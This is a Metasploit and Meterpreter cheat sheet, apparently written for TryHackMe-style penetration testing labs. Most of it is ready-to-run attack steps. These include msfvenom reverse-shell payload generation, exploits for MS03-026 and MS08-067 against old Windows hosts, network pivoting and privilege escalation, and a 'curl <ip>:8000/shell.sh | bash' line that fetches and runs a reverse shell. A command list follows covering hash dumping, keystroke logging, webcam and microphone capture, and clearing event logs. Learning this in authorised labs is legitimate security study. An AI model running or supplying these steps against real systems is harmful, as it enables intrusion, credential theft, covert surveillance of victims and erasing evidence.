Metasploit

Set the payload:

set payload <path>

Set the exploit:

use exploit/<path>

Quick Commands

  • ctrl + z: Background a session

  • setg <name> <value>: Set global value

  • sessions -l: See background sessions

  • sessions -i <session num>: Go back into backgrounded sessions

  • options: Show parameters

  • hashdump: Dump hashes

  • unset payload: Clear payload

  • run post/windows/gather/hashdump: Windows hashdump alternative

  • ipconfig: Grab interface info

  • run autoroute -s <interfaceIP>/<CIDR mask>: Network pivot

PHP web Meterpreter shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php

HTA reverse shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP ADDRESS> LPORT=443 -f hta-psh -o thm.hta

# OR you can do it through Metasploit
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_tcp

Easy WinXP pwn

In the Metasploit console:

use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/meterpreter/bind_tcp
set RHOST <xp machine IP>
exploit

Easy Win2000 pwn

In the Metasploit console:

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set rhost <Target IP>
set lhost <attacker IP>
set lport <attacker port>
exploit

Auxiliary Port Scan

# In the Meterpreter session on the compromised machine
run autoroute -s <interfaceIP>/<CIDR mask>
# Ctrl+Z to background the session
use auxiliary/scanner/portscan/tcp
set RHOSTS <pivot network>/<CIDR mask>
set ports <port 1>,<port 2>,<port n>
set threads 50
run

Privilege Escalation

To elevate your privileges, use the commands:

use priv
getsystem

# OR
use exploit/windows/local/<technique>
# SET YOUR OPTIONS
exploit

Screen Capture:

# Elevate privileges
getsystem
# Load the espia extension
use espia
# Migrate into explorer.exe
ps
migrate <pid of explorer.exe>
# Grab a screenshot
screengrab

Linux Elevate Your Shell:

Generate your payloads:

msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=1234 -f raw > shell.sh

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.bin

Start listener and server:

python3 -m http.server
nc -nlvp 1234

From your unstable shell, fetch and run the bash reverse shell (caught by the nc listener):

curl <ip>:8000/shell.sh | bash

Start your meterpreter listener:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
exploit

Download your meterpreter payload and run it:

curl -o /tmp/shell.bin <ip>:8000/shell-x86.bin
chmod +x /tmp/shell.bin
cd /tmp
./shell.bin

Elevate the shell's permissions:

^Z
use post/multi/recon/local_exploit_suggester
set SESSION <session num>
run

Using the MSFDB and workspaces:

systemctl start postgresql
msfdb init
msfconsole
db_status

  • workspace: View workspaces

  • workspace -a <workspace name>: Add a workspace

  • workspace -d <workspace name>: Delete a workspace

  • workspace <workspace name>: Change current workspace

  • workspace -h: Show workspace options

  • help: Show database commands

  • db_nmap <params> <ip>: Save nmap scan to db

  • hosts: Get host information

  • services: Get service information

  • hosts -R: Add hosts to RHOST param

  • services -S <service name>: Search for service in all hosts

Amazing TryHackMe (THM) quick reference command list:

Core commands

  • background: Backgrounds the current session

  • exit: Terminate the Meterpreter session

  • guid: Get the session GUID (Globally Unique Identifier)

  • help: Displays the help menu

  • info: Displays information about a Post module

  • irb: Opens an interactive Ruby shell on the current session

  • load: Loads one or more Meterpreter extensions

  • migrate: Allows you to migrate Meterpreter to another process

  • run: Executes a Meterpreter script or Post module

  • sessions: Quickly switch to another session

File system commands

  • cd: Will change directory

  • ls: Will list files in the current directory (dir will also work)

  • pwd: Prints the current working directory

  • edit: will allow you to edit a file

  • cat: Will show the contents of a file to the screen

  • rm: Will delete the specified file

  • search: Will search for files

  • upload: Will upload a file or directory

  • download: Will download a file or directory

Networking commands

  • arp: Displays the host ARP (Address Resolution Protocol) cache

  • ifconfig: Displays network interfaces available on the target system

  • netstat: Displays the network connections

  • portfwd: Forwards a local port to a remote service

  • route: Allows you to view and modify the routing table

System commands

  • clearev: Clears the event logs

  • execute: Executes a command

  • getpid: Shows the current process identifier

  • getuid: Shows the user that Meterpreter is running as

  • kill: Terminates a process

  • pkill: Terminates processes by name

  • ps: Lists running processes

  • reboot: Reboots the remote computer

  • shell: Drops into a system command shell

  • shutdown: Shuts down the remote computer

  • sysinfo: Gets information about the remote system, such as OS

Other commands (these are listed under different menu categories in the help menu)

  • idletime: Returns the number of seconds the remote user has been idle

  • keyscan_dump: Dumps the keystroke buffer

  • keyscan_start: Starts capturing keystrokes

  • keyscan_stop: Stops capturing keystrokes

  • screenshare: Allows you to watch the remote user's desktop in real time

  • screenshot: Grabs a screenshot of the interactive desktop

  • record_mic: Records audio from the default microphone for X seconds

  • webcam_chat: Starts a video chat

  • webcam_list: Lists webcams

  • webcam_snap: Takes a snapshot from the specified webcam

  • webcam_stream: Plays a video stream from the specified webcam

  • getsystem: Attempts to elevate your privilege to that of local system

  • hashdump: Dumps the contents of the SAM database
